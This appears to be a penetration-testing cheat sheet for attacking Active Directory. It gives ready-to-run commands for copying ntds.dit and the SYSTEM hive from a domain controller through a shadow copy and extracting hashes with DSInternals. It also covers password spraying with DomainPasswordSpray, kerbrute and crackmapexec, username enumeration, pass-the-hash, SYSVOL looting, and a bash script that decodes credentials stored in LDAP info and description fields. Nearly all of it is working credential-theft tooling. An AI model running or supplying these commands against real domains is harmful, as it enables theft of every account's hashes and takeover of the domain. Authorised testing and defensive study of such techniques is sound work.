Tools
Install DSInternals using PowerShell (elevated prompt)
Set-ExecutionPolicy Unrestricted
Install-Module -Name DSInternals
Install Impacket in Linux
sudo apt install python3-impacket
Install BloodHound in Linux (the apt package is the GUI with its neo4j backend; the pip package is bloodhound-python, the collector run from Linux)
sudo apt install bloodhound
pip install bloodhound
Install Kerbrute
Install Crackmapexec
sudo apt install crackmapexec
Dump ntds.dit and the SYSTEM hive from a Volume Shadow Copy (run on the DC from an elevated prompt)
reg SAVE HKLM\SYSTEM c:\temp\sys
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\temp\dit
(use the Shadow Copy Volume Name that vssadmin prints; it is only ...HarddiskVolumeShadowCopy1 when no other shadow copies exist on the host)
ESENTUTL /p c:\temp\dit /!1024 /8 /o
(repairs the copied database if it was captured in a dirty state; only needed if DSInternals refuses to open the file as is)
Extract the accounts with DSInternals: the boot key from the SYSTEM hive is what decrypts the password hashes stored in ntds.dit
$key=Get-BootKey -SystemHiveFilePath c:\temp\sys
Get-ADDBAccount -All -BootKey $key -DBPath c:\temp\dit
Password spraying Active Directory (DomainPasswordSpray enumerates the domain's users itself when no user list is given)
Import-Module c:\tools\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password kitty-kat
Invoke-DomainPasswordSpray -PasswordList c:\tools\adpass.txt
Kerberos brute-forcing attacks
Kerbrute
Username Enumeration
./kerbrute userenum -d cybex.com --dc <domain IP> <username list>
Password spray (one password against every user in the list; run once per password and stay under the domain lockout threshold)
./kerbrute passwordspray -d cybex.com --dc <domain IP> <username list> <password>
CrackMapExec to access and enumerate AD
crackmapexec smb <ip/cidr>
Pass the hash (authenticate with the NT hash directly, no cracking needed)
crackmapexec smb <domain IP> -u "<username>" -H "<NT hash>"
Password authentication (-u and -p also accept a file with one entry per line, which turns this into a spray)
crackmapexec smb <domain IP> -u "<username>" -p <password or password list file>
Investigate the SYSVOL share (readable by every domain user; holds Group Policy scripts and preference files)
smbclient \\\\<Domain IP address>\\sysvol -U <username>
Retrieve a file
smb: \> get <file name or file location>
Take advantage of legacy data in LDAP attributes (notes left in free-text fields such as info and description)
JXplorer (connect to the DC over LDAP)
Enter username and password
Select the Table Editor tab on the right-hand side
Read the Info attribute; its value is base64 encoded
Decode the Base64 value
echo "<base64 encoded text>" | base64 -d
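Reading one attribute in JXplorer and decoding it by hand, as in the steps above, generalises to a whole LDAP export. The script below is an added example, not part of the original notes: it takes an LDIF dump of the kind `ldapsearch -LLL` produces and decodes both LDIF's own base64 encoding (`attr::` lines, used when a value has a newline, a leading space or non-ASCII characters) and base64 strings stored verbatim in the free-text attributes info, description and comment, which is the case the JXplorer step shows. The LDIF sample and the account in it are constructed.

```shell
#!/usr/bin/env bash
# Added example (not part of the original notes): decode an LDIF export so
# that legacy notes stashed in info/description/comment can be read.
#   "attr:: <b64>"  is LDIF base64 encoding and is always decoded;
#   "attr: <b64>"   in a free-text attribute is a base64 string stored as the
#                   value itself; it is decoded only if the result is printable.
# Needs GNU or BusyBox base64 (-d); on macOS use `base64 -D` instead.

# Constructed sample LDIF (not a real capture): the Notes field (info) is
# LDIF-encoded and folded because it spans two lines; description holds a
# base64 string verbatim.
SAMPLE_LDIF='dn: CN=svc_legacy,OU=Service Accounts,DC=cybex,DC=com
sAMAccountName: svc_legacy
description: UGFzc3dvcmQ6IFN1bW1lcjIwMjMh
info:: bGVnYWN5
 CmFkbWlu
userAccountControl: 66048'

# Join LDIF continuation lines: a line starting with a space continues the
# previous one, and the space itself is not part of the value.
ldif_unfold() {
  sed -e :a -e '$!N;s/\n //;ta' -e 'P;D'
}

# Decode one base64 string to stdout; non-zero status if it is not valid base64.
b64dec() {
  printf '%s' "$1" | base64 -d 2>/dev/null
}

# True if the argument is made only of base64 characters, is at least 8 long
# and has a length that is a multiple of 4 (cheap filter before decoding).
looks_like_base64() {
  case "$1" in
    *[!A-Za-z0-9+/=]*) return 1 ;;
  esac
  [ $(( ${#1} % 4 )) -eq 0 ] && [ ${#1} -ge 8 ]
}

# True if stdin contains only printable ASCII and whitespace.
is_printable() {
  ! LC_ALL=C grep -q '[^[:print:][:space:]]'
}

# Read LDIF on stdin, print it with base64 values decoded.
decode_ldif() {
  ldif_unfold | while IFS= read -r line; do
    attr=${line%%:*}
    rest=${line#"$attr"}
    case "$rest" in
      ':: '*)
        # LDIF-encoded value: decode unconditionally.
        printf '%s: %s\n' "$attr" "$(b64dec "${rest#':: '}")"
        ;;
      ': '*)
        value=${rest#': '}
        case "$attr" in
          info|description|comment)
            if looks_like_base64 "$value" && decoded=$(b64dec "$value") \
               && printf '%s' "$decoded" | is_printable; then
              printf '%s: %s  [base64 -> %s]\n' "$attr" "$value" "$decoded"
              continue
            fi
            ;;
        esac
        printf '%s\n' "$line"
        ;;
      *) printf '%s\n' "$line" ;;
    esac
  done
}

# Usage against a real export:  ldapsearch -LLL ... > dump.ldif; decode_ldif < dump.ldif
printf '%s\n' "$SAMPLE_LDIF" | decode_ldif
```

The printable check is what keeps the heuristic honest: a description such as "Temp" is valid base64 by character set but decodes to bytes no one typed, and is left alone. Binary attributes that LDIF always base64-encodes (objectSid, objectGUID) will still be decoded by the `::` branch and print as raw bytes; filter them out of the ldapsearch query if that gets noisy.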